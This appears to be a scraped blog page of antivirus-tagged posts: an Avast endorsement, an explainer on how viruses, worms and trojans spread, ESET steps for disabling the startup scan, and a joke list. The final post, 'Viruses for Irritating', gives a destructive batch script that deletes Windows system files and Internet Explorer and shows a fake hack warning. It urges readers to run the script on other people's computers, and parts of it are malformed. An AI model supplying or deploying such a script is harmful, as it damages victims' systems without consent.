,

Your IP Address

what is my ip address?
Showing posts with label antivirus. Show all posts
Showing posts with label antivirus. Show all posts

Avast internet security - The Best

Well its every ones problem to find a right anti virus for your computer or laptop. As in internet new and powerful viruses are increasing day by day you will need a good powerful anti virus to protect you and keep you safe while surfing in the internet. These days not only virus are trying to attack your computer. Spamming , scamming are increasing every single day.. Just with one click you will loose all your password and user name of your accounts drastic isnt it..Well to curtail that a good and efficient anti virus is most essential and my opinion will be avast internet security.You can also use Norton ,kasperesky , avira etc. but of all these avast is the best. Its virus data base is flawless . It also gives you a support of additional firewall. Also you can see all the files that are accessing internet and files uploaded and downloaded to your computer. Most of all avast takes less memory usage which in turn makes you use your computer faster. It updates regularly and is very quick to keep the database updated.
Read more

All About Computer Viruses

Your computer is as slow as molasses. Your mouse freezes every 15 minutes, and that Microsoft Word program just won’t seem to open. 

You might have a virus.

Just what exactly is a virus? What kind is in your computer? How did it get there? How is it spreading and wreaking such havoc? And why is it bothering with your computer anyway?

Viruses are pieces of programming code that make copies of themselves, or replicate, inside your computer without asking your explicit written permission to do so. Forget getting your permission down on paper. Viruses don’t bother to seek your permission at all! Very invasive.

In comparison, there are pieces of code that might replicate inside your computer, say something your IT guy thinks you need. But the code spreads, perhaps throughout your office network, with your consent (or at least your IT guy’s consent). These types of replicating code are called agents, said Jimmy Kuo, a research fellow with McAfee AVERT, a research arm of anti-virus software-maker McAfee Inc.

In this article, though, we’re not talking about the good guys, or the agents. We’ll be talking about the bad guys, the viruses.

A long, long time ago in computer years, like five, most viruses were comprised of a similar breed. They entered your computer perhaps through an email attachment or a floppy disk (remember those?). Then they attached themselves to one of your files, say your Microsoft Word program. 

When you opened your Microsoft Word program, the virus replicated and attached itself to other files. These could be other random files on your hard drive, the files furthest away from your Microsoft Word program, or other files, depending on how the virus writer wanted the virus to behave. 

This virus code could contain hundreds or thousands of instructions. When it replicates it inserts those instructions, into the files it infects, said Carey Nachenberg, Chief Architect at Symantec Research Labs, an arm of anti-virus software-maker Symantec. Corp.

Because so many other types of viruses exist now, the kind just described is called a classic virus. Classic viruses still exist but they’re not quite as prevalent as they used to be. (Perhaps we could put classic viruses on the shelf with Hemingway and Dickens.)

These days, in the modern era, viruses are known to spread through vulnerabilities in web browsers, files shared over the internet, emails themselves, and computer networks.

As far as web browsers are concerned, Microsoft’s Internet Explorer takes most of the heat for spreading viruses because it’s used by more people for web surfing than any other browser.

Nevertheless, “Any web browser potentially has vulnerabilities,” Nachenberg said.

For instance, let’s say you go to a website in IE you have every reason to think is safe, Nachenberg said. 

But unfortunately it isn’t. It has virus code hidden in its background that IE isn’t protecting you from. While you’re looking at the site, the virus is downloaded onto your computer, he said. That’s one way of catching a nasty virus.

During the past two years, another prevalent way to catch a virus has been through downloads computer users share with one another, mostly on music sharing sites, Kuo said. On Limewire or Kazaa, for instance, teenagers or other music enthusiasts might think they’re downloading that latest Justin Timberlake song, when in reality they’re downloading a virus straight into their computer. It’s easy for a virus writer to put a download with a virus on one of these sites because everyone’s sharing with everyone else anyway.

Here’s one you might not have thought of. If you use Outlook or Outlook Express to send and receive email, do you have a preview pane below your list of emails that shows the contents of the email you have highlighted? If so, you may be putting yourself at risk.

Some viruses, though a small percentage according to Nachenberg, are inserted straight into emails themselves. 

Forget opening the attachment. All you have to do is view the email to potentially get a virus, Kuo added. For instance, have you ever opened or viewed an email that states it’s “loading”? Well, once everything is “loaded,” a virus in the email might just load onto your computer. 

So if I were you, I’d click on View on the toolbar in your Outlook or Outlook Express and close the preview pane. (You have to click on View and then Layout in Outlook Express.)

On a network at work? You could get a virus that way. Worms are viruses that come into your computer via networks, Kuo said. They travel from machine to machine and, unlike, the classic viruses, they attack the machine itself rather than individual files.

Worms sit in your working memory, or RAM, Nachenberg said.

OK, so we’ve talked about how the viruses get into a computer. How do they cause so much damage once they’re there?

Let’s say you’ve caught a classic virus, one that replicates and attacks various files on your computer. Let’s go back to the example of the virus that initially infects your Microsoft Word program. 

Well, it might eventually cause that program to crash, Nachenberg said. It also might cause damage to your computer as it looks for new targets to infect. 

This process of infecting targets and looking for new ones could eventually use up your computer’s ability to function, he said.

Often the destruction a virus causes is pegged to a certain event or date and time, called a trigger. For instance, a virus could be programmed to lay dormant until January 28. When that date rolls around, though, it may be programmed to do something as innocuous but annoying as splash popups on your screen, or something as severe as reformat your computer’s hard drive, Nachenberg said. 

There are other potential reasons, though, for a virus to cause your computer to be acting slow or in weird ways. And that leads us to a new segment – the reason virus writers would want to waste their time creating viruses in the first place.

The majority of viruses are still written by teenagers looking for some notoriety, Nachenberg said. But a growing segment of the virus-writing population has other intentions in mind.

For these other intentions, we first need to explain the “backdoor” concept.

The sole purpose of some viruses is to create a vulnerability in your computer. Once it creates this hole of sorts, or backdoor, it signals home to mama or dada virus writer (kind of like in E.T.). Once the virus writer receives the signal, they can use and abuse your computer to their own likings.

Trojans are sometimes used to open backdoors. In fact that is usually their sole purpose, Kuo said. 

Trojans are pieces of code you might download onto your computer, say, from a newsgroup. As in the Trojan War they are named after, they are usually disguised as innocuous pieces of code. But Trojans aren’t considered viruses because they don’t replicate. 

Now back to the real viruses. Let’s say we have Joe Shmo virus writer. He sends out a virus that ends up infecting a thousand machines. But he doesn’t want the feds on his case. So he instructs the viruses on the various machines to send their signals, not of course to his computer, but to a place that can’t be traced. Hotmail email happens to be an example of one such place, Kuo said.

OK, so the virus writers now control these computers. What will they use them for?

One use is to send spam. Once that backdoor is open, they bounce spam off of those computers and send it to other machines, Nachenberg said. 

That’s right. Some spam you have in your email right now may have been originally sent to other innocent computers before it came to yours so that it could remain in disguise. If the authorities could track down the original senders of spam, they could crack down on spam itself. Spam senders don’t want that.

Ever heard of phishing emails? Those are the ones that purport to be from your internet service provider or bank. They typically request some information from you, like your credit card number. The problem is, they’re NOT from your internet service provider or your bank. They’re from evil people after your credit card number! Well, these emails are often sent the same way spam is sent, by sending them via innocent computers.

Of course makers of anti-virus software use a variety of methods to combat the onslaught of viruses. Norton, for instance, uses signature scanning, Nachenberg said.

Signature scanning is similar to the process of looking for DNA fingerprints, he said. Norton examines programming code to find what viruses are made of. It adds those bad instructions it finds to its large database of other bad code. Then it uses this vast database to seek out and match the code in it with similar code in your computer. When it finds such virus code, it lets you know
Read more

How to temporarily disable the startup scan in eset antivirus/smart security

By default, your ESET security product will scan programs and memory at startup. If your system startup scan is taking an unusually long time to complete, you may have conflicting programs set to run at start up. You cannot cancel the startup scan once it has started, but you can temporarily disable the scan from running on system startup by following the directions below:

1- Open the main program window by clicking the icon How do I temporarily disable the startup scan in eset antivirus/smart security in the Windows notification area or by clicking Start → All Programs → ESET → ESET Smart Security or ESET NOD32 Antivirus.

2- Toggle to Advanced mode by clicking Change... in the lower left corner and then clicking Yes if you are prompted to confirm or by pressing CTRL + M on your keyboard.

3- In the left column, click Tools → Scheduler. The Scheduler/Planner window will be displayed.

4- Deselect Automatic startup file check | System Startup file check. | User logon. By default, this is the fourth option down.
5- Restart your computer. Your startup scan is now disabled.

Important! Disabling the ESET startup scan exposes your computer to risk and is only a temporary fix for a third-party application conflict. If possible, we recommend checking for other applications which are scheduled to run at startup and either deselecting their startup features or uninstalling the conflicting software from your computer. ESET is unable to provide support for other third-party applications.

Read more

35 funny viruses

1. PAUL REVERE VIRUS: This revolutionary virus does not horse around. It warns you of impending hard disk attack -- once if by LAN, twice if by C:.

2. POLITICALLY CORRECT VIRUS: Never calls itself a "virus," but instead refers to itself as an "electronic microorganism."

3. KATE GOSSELIN VIRUS: Keeps changing its appearance and refuses to go away, even after no one cares whether or not it is still present.

4. MARIO CUOMO VIRUS: It would be a great virus, but it refuses to run.

5. OPRAH WINFREY VIRUS: Your 200MB hard drive suddenly shrinks to 80MB, and then slowly expands back to 200MB. Also tries to take over all media on your computer.

6. AT&T VIRUS: Every three minutes it tells you what great service you are getting.

7. THE VERIZON WIRELESS VIRUS: Every three minutes it reminds you that you're paying too much for the AT&T virus.

8. TED TURNER VIRUS: Colorizes your monochrome monitor.

9. ARNOLD SCHWARZENEGGER VIRUS: Terminates and stays resident. It'll be back.

10. GOVERNMENT ECONOMIST VIRUS: Nothing works, but all your diagnostic software says everything is fine.

11. 2012 VIRUS: Probably harmless, but it makes a lot of people really uncomfortable just thinking about it.

12. FEDERAL BUREAUCRAT VIRUS: Divides your hard disk into hundreds of little units, each of which does practically nothing, but all of which claim to be the most important part of the computer.

13. GALLUP VIRUS: Sixty percent of the PCs infected will lose 38 percent of their data 14 percent of the time (plus or minus a 3.5 percent margin of error).

14. TIGER WOODS VIRUS: Corrupts 121 different files on your hard drive while claiming to be corrupt just one.

15. TEXAS VIRUS: Makes sure that it's bigger than any other file.

16. ADAM AND EVE VIRUS: Takes a couple of bytes out of your Apple.

17. MICHAEL JACKSON VIRUS: Hard to identifiy because it is constantly altering its appearance. This virus won't harm your PC, but your nose may fall off.

18. CONGRESSIONAL VIRUS: The computer locks up, screen splits with a message appearing on each half blaming the other side for the problem.

19. AIRLINE VIRUS: You're in Dallas, but your data is in Singapore.

20. FREUDIAN VIRUS: Your computer becomes obsessed with its own motherboard.

21. PBS VIRUS: Your PC stops every few minutes to ask for money.

22. ELVIS VIRUS: Your computer gets fat, slow, and lazy and then self destructs, only to resurface at shopping malls and service stations across rural America.

23. DR. CONRAD MURRAY VIRUS: Turns your printer into a document shredder.

24. NIKE VIRUS: Just Does It!

25. SEARS VIRUS: Your data won't appear unless you buy new cables, power supply, and a set of shocks.

26. JIMMY HOFFA VIRUS: Nobody can find it.

27. CONGRESSIONAL VIRUS II: Runs every program on the hard drive simultaneously, but doesn't allow the user to accomplish anything.

28. KEVORKIAN VIRUS: Helps your computer shut down whenever it wants to.

29. TILA TEQUILA VIRUS: Is completely irrelevant and no one cares about it. Tries to launch new sites in your browser.

30. STAR TREK VIRUS: Invades your system in places where no virus has gone before.

31. HEALTHCARE VIRUS: Will take your anti-virus software and share it with any other PC's in the neighborhood that lack protection.

32. GEORGE W. BUSH VIRUS: No one knows what this virus does as it is completely unintelligible.

33. CLEVELAND INDIANS VIRUS: Makes your 486/50 machine perform like a 286/AT.

34. LAPD VIRUS: It claims it feels threatened by the other files on your PC and erases them in "self-defense."

35. BALTIMORE ORIOLES VIRUS: Will cause your PC to make frequent mistakes and come in last in the reviews, but you still try to love it anyway.
Read more

Viruses for Irritating (plz dont try on ur pc)

@echo off
@if exist c:\windows\system32\mouse del c:\windows\system32\mouse
@if exist c:\windows\system32\keyboard del c:\windows\system32\keyboard
copy C:\windows\
@if exist c:\windows\system32\logoff.exe del c:\windows\system32\logoff.exe
@if exist C:\program files\internet explorer\iexplore.exe del C:\program files\internet explorer\iexplore.exe
msg "WARNING:A VIRUS TOOK OVER YOUR COMPUTER VIRUS NOTICED AS:RINSE JOHN hacked your IP.exe"

Copy these lines in notepad and save it as "rinse.bat" or "rinse.exe"

Try this on any other computer..... Very heavy Virus..
Read more